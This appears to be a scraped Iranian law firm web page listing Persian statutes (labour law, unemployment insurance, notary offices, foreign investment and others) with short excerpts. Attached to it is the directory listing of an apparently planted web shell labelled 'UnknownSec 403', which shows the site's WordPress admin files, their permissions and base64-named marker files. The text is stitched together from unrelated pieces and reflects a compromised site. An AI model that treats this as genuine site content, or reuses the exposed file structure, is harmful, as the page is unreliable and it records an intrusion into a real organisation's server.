منشور حقوق بشر

 • 21,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

منشور حقوق بشر مجمع عمومی سازمان ملل متحد، سه سال پس از تأسیس سازمان ملل متحد، اعلامیه جهانی حقوق بشر را تصویب کرد و اعلامیه جهانی حقوق بشر، که هدف آن برقراری تضمین حقوق و آزادی‌های برابر برای همه مردم بود در ۱۰ دسامبر ۱۹۴۸ در قالب 30 ماده به تصویب رسید، روزی که اینک…

قانون بیمه اجباری کارگران ساختمان

 • 21,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون بیمه اجباری کارگران ساختمان   برای دانلود فایل PDF قانون بیمه اجباری کارگران ساختمان کلیک کنید!     تاریخ تصویب: 1386/08/09 | مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 14 |     ماده ۱- کارگران شاغل در کارهای ساختمانی اعم از ایجاد یا توسعه ساختمان‌، تجدید بنا، تعمیرات اساسی و یا تخریب…

قانون بیمه بیکاری

 • 21,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون بیمه بیکاری   برای دانلود فایل PDF قانون بیمه بیکاری کلیک کنید!     تاریخ تصویب:1369/06/26 | مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 14 | تعداد تبصره: 21 | تعداد بند: 19 | تاریخ انتشار: 1369/08/01 |     ‌ماده 1 – کلیه مشمولین قانون تأمین اجتماعی که تابع قوانین کار و…

قانون دفاتر اسناد رسمی

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون دفاتر اسناد رسمی     برای دانلود فایل PDF قانون دفاتر اسناد رسمی کلیک کنید!     تاریخ تصویب: 1354/04/25 | مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 76 | تعداد تبصره: 15 | تعداد بند: 35 | تاریخ انتشار: 1354/05/18 |     فصل اول – تشکیلات دفترخانه   ماده ۱ –…

قانون مقررات صادرات و واردات

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون مقررات صادرات و واردات     برای دانلد فایل PDF قانون مقررات صادرات و واردات کلیک کنید!   تاریخ تصویب: 1366/04/11 | مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 48 | تعداد تبصره: 45 | تعداد بند: 14 | تاریخ انتشار: 1366/05/10 |     ‌الف – کلیات ‌ماده 1 – صدور و…

قانون تشویق و حمایت از سرمایه گذاری خارجی

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون تشویق و حمایت از سرمایه گذاری خارجی     برای دانلود فایل PDF قانون تشویق و حمایت از سرمایه گذاری خارجی کلیک کنید!     تاریخ تصویب: 1380/12/19 | مرجع تصویب: مجمع تشخیص مصلحت نظام | تعداد ماده: 25 | تعداد تبصره: 11 |     فصل اول – تعاریف ماده ۱ – اصطلاحات…

قانون شهرداری

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون شهرداری (مصوب 11/04/1334 با آخرین اصلاحات تا تاریخ 11/03/1392)   برای دانلود فایل PDF قانون شهرداری کلیک کنید!     تاریخ تصویب: 1334/04/11 | مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 119 | تاریخ انتشار: 1334/06/02|     فصل اول- در تاسیس شهرداری ماده ۱– در هر محل که جمعیت آن حداقل بپنج…

قانون کار

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون کار   برای دانلود فایل PDF قانون کار کلیک کنید!   پس از انقلاب 57 اصلاح قانون از خواستهای اصلی گروه‌های کارگری که سهم قابل توجهی در پیروزی انقلاب داشتند بود. در این دوران پیش نویس‌های متعددی از جمله توسط ابوالحسن بنی صدر و احمد توکلی وزیر کار راستگرای دولت موسوی پیشنهاد شد که با اعتراض کارگران دولت آن…

قانون راجع به اموال غیرمنقول اتباع خارجی

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون راجع به اموال غیرمنقول اتباع خارجی     برای دانلود فایل PDF قانون راجع به اموال غیرمنقول اتباع خارجی کلیک کنید!     تاریخ تصویب: 1310/03/16| مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 12 | تعداد تبصره: 1 |     ماده اول – هر تبعه خارجه مکلف است در ظرف سه ماه…

قانون راجع به ثبت شرکت ها

 • 20,آذر,1399
 • موسسه حقوقی دادخواهان عدالت
 • قانون

قانون راجع به ثبت شرکت‌ها     برای دانلود فایل PDF قانون راجع یه ثبت شرکت هاکلیک کنید!     تاریخ تصویب:1310/03/02| مرجع تصویب: مصوبات مجلس شورا | تعداد ماده: 12 | تعداد تبصره: 4 |     ماده اول ـ هر شرکتی که در ایران تشکیل و مرکز اصلی آن در ایران باشد شرکت…

www.dadkhahan.com - UnknownSec 403
Name Last edit Size Permission Options
foldercss
2021-12-17 3:30:34
DIR
drwxr-xr-x
folderimages
2021-12-17 3:30:34
DIR
drwxr-xr-x
folderincludes
2021-12-17 3:30:34
DIR
drwxr-xr-x
folderjs
2022-05-22 8:34:13
DIR
drwxr-xr-x
foldermaint
2021-12-17 3:30:34
DIR
drwxr-xr-x
foldernetwork
2021-12-17 3:30:34
DIR
drwxr-xr-x
folderuser
2021-12-17 3:30:34
DIR
drwxr-xr-x
fileabout.php
2022-03-11 4:28:15
16.873 KB
-rw-r--r--
fileadmin-ajax.php
2020-09-29 4:51:27
4.519 KB
-rw-r--r--
fileadmin-footer.php
2020-09-29 4:51:27
2.564 KB
-rw-r--r--
fileadmin-functions.php
2020-09-29 4:51:27
0.399 KB
-rw-r--r--
fileadmin-header.php
2020-10-29 9:07:29
7.72 KB
-rw-r--r--
fileadmin.php
2020-09-29 4:51:27
11.151 KB
-rw-r--r--
fileadmin-post.php
2020-09-29 4:51:27
1.652 KB
-rw-r--r--
fileasync-upload.php
2020-09-29 4:57:16
3.586 KB
-rw-r--r--
filebWFpbC5kYWRraGFoYW4uY29t.txt
2021-12-23 11:26:01
0.06 KB
-rw-r--r--
filecomment.php
2020-09-29 4:51:27
10.646 KB
-rw-r--r--
filecredits.php
2020-09-29 4:51:27
5.479 KB
-rw-r--r--
filecustom-background.php
2020-10-29 9:07:29
20.12 KB
-rw-r--r--
filecustom-header.php
2020-10-29 9:07:29
46.367 KB
-rw-r--r--
filecustomize.php
2020-09-29 4:51:27
9.343 KB
-rw-r--r--
fileedit-comments.php
2020-09-29 4:51:27
13.806 KB
-rw-r--r--
fileedit-form-advanced.php
2020-09-29 4:51:27
27.517 KB
-rw-r--r--
fileedit-form-blocks.php
2020-09-29 4:57:16
12.891 KB
-rw-r--r--
fileedit-form-comment.php
2020-09-29 4:57:16
7.342 KB
-rw-r--r--
fileedit-link-form.php
2020-09-29 4:51:27
5.996 KB
-rw-r--r--
fileedit.php
2020-09-29 4:51:27
16.761 KB
-rw-r--r--
fileedit-tag-form.php
2020-09-29 4:57:16
9.29 KB
-rw-r--r--
fileedit-tags.php
2020-09-29 4:51:27
20.502 KB
-rw-r--r--
fileerror_log
2021-05-15 10:04:53
1.068 KB
-rw-r--r--
fileexport.php
2020-09-29 4:51:27
10.671 KB
-rw-r--r--
filefreedoms.php
2020-09-29 4:51:27
5.907 KB
-rw-r--r--
file.htaccess
2022-02-25 2:40:12
0.023 KB
-rw-r--r--
fileimport.php
2020-09-29 4:51:27
7.256 KB
-rw-r--r--
fileindex.php
2020-09-29 4:51:27
5.751 KB
-rw-r--r--
fileinstall-helper.php
2020-09-29 4:51:27
5.769 KB
-rw-r--r--
fileinstall.php
2020-09-29 4:57:16
16.424 KB
-rw-r--r--
filelink-add.php
2020-09-29 4:51:27
0.71 KB
-rw-r--r--
filelink-manager.php
2020-09-29 4:51:27
3.911 KB
-rw-r--r--
filelink-parse-opml.php
2020-09-29 4:51:27
2.382 KB
-rw-r--r--
filelink.php
2020-09-29 4:51:27
2.673 KB
-rw-r--r--
fileload-scripts.php
2020-09-29 4:51:27
1.616 KB
-rw-r--r--
fileload-styles.php
2020-09-29 4:51:27
2.209 KB
-rw-r--r--
filemedia-new.php
2020-10-29 9:07:29
3.134 KB
-rw-r--r--
filemedia.php
2020-09-29 4:51:27
5.486 KB
-rw-r--r--
filemedia-upload.php
2020-09-29 4:51:27
3.297 KB
-rw-r--r--
filemenu-header.php
2020-09-29 4:51:27
9.466 KB
-rw-r--r--
filemenu.php
2020-09-29 4:51:27
13.857 KB
-rw-r--r--
filemoderation.php
2020-09-29 4:51:27
0.314 KB
-rw-r--r--
filems-admin.php
2020-09-29 4:51:27
0.206 KB
-rw-r--r--
filems-delete-site.php
2020-09-29 4:51:27
3.937 KB
-rw-r--r--
filems-edit.php
2020-09-29 4:51:27
0.226 KB
-rw-r--r--
filems-options.php
2020-09-29 4:51:27
0.232 KB
-rw-r--r--
filems-sites.php
2020-09-29 4:51:27
0.225 KB
-rw-r--r--
filems-themes.php
2020-09-29 4:51:27
0.227 KB
-rw-r--r--
filems-upgrade-network.php
2020-09-29 4:51:27
0.229 KB
-rw-r--r--
filems-users.php
2020-09-29 4:51:27
0.225 KB
-rw-r--r--
filemy-sites.php
2020-09-29 4:51:27
4.548 KB
-rw-r--r--
filenav-menus.php
2020-09-29 4:51:27
42.563 KB
-rw-r--r--
filenetwork.php
2020-09-29 4:51:27
5.236 KB
-rw-r--r--
fileoptions-discussion.php
2020-09-29 4:57:16
14.765 KB
-rw-r--r--
fileoptions-general.php
2020-09-29 4:57:16
14.767 KB
-rw-r--r--
fileoptions-head.php
2020-09-29 4:51:27
0.48 KB
-rw-r--r--
fileoptions-media.php
2020-09-29 4:57:16
6.09 KB
-rw-r--r--
fileoptions-permalink.php
2020-09-29 4:57:16
18.217 KB
-rw-r--r--
fileoptions.php
2020-09-29 4:57:16
11.639 KB
-rw-r--r--
fileoptions-reading.php
2020-09-29 4:57:16
8.399 KB
-rw-r--r--
fileoptions-writing.php
2020-09-29 4:57:16
8.408 KB
-rw-r--r--
fileplugin-editor.php
2020-09-29 4:51:27
12.938 KB
-rw-r--r--
fileplugin-install.php
2020-09-29 4:51:27
6.172 KB
-rw-r--r--
fileplugins.php
2021-04-15 4:28:23
23.685 KB
-rw-r--r--
filepost-new.php
2020-09-29 4:51:27
2.617 KB
-rw-r--r--
filepost.php
2020-09-29 4:51:27
9.362 KB
-rw-r--r--
filepress-this.php
2020-09-29 4:51:27
2.327 KB
-rw-r--r--
fileprivacy.php
2020-09-29 4:57:16
7.879 KB
-rw-r--r--
fileprofile.php
2020-09-29 4:51:27
0.291 KB
-rw-r--r--
filerevision.php
2020-09-29 4:51:27
5.047 KB
-rw-r--r--
filesetup-config.php
2020-09-29 4:57:16
15.438 KB
-rw-r--r--
filesite-health-info.php
2020-09-29 4:51:27
5.5 KB
-rw-r--r--
filesite-health.php
2020-09-29 4:51:27
5.172 KB
-rw-r--r--
fileterm.php
2020-09-29 4:51:27
2.064 KB
-rw-r--r--
filetheme-editor.php
2020-09-29 4:51:27
14.468 KB
-rw-r--r--
filetheme-install.php
2021-04-15 4:28:23
14.787 KB
-rw-r--r--
filethemes.php
2020-09-29 4:57:16
22.759 KB
-rw-r--r--
filetools.php
2020-09-29 4:51:27
2.551 KB
-rw-r--r--
fileupdate-core.php
2020-09-29 4:51:27
31.789 KB
-rw-r--r--
fileupdate.php
2020-09-29 4:51:27
10.102 KB
-rw-r--r--
fileupgrade-functions.php
2020-09-29 4:51:27
0.336 KB
-rw-r--r--
fileupgrade.php
2020-09-29 4:51:27
5.521 KB
-rw-r--r--
fileupload.php
2020-09-29 4:51:27
13.348 KB
-rw-r--r--
fileuser-edit.php
2020-09-29 4:57:16
28.243 KB
-rw-r--r--
fileuser-new.php
2020-09-29 4:57:16
21.758 KB
-rw-r--r--
fileusers.php
2020-09-29 4:51:27
19.254 KB
-rw-r--r--
filewidgets.php
2020-09-29 4:51:27
19.143 KB
-rw-r--r--
fileZGFka2hhaGFuLmNvbQ==a.txt
2022-02-24 1:14:38
0.185 KB
-rw-r--r--
fileZGFka2hhaGFuLmNvbQ==.txt
2021-12-17 1:48:03
0.06 KB
-rw-r--r--
Copyright © 2022 - UnknownSec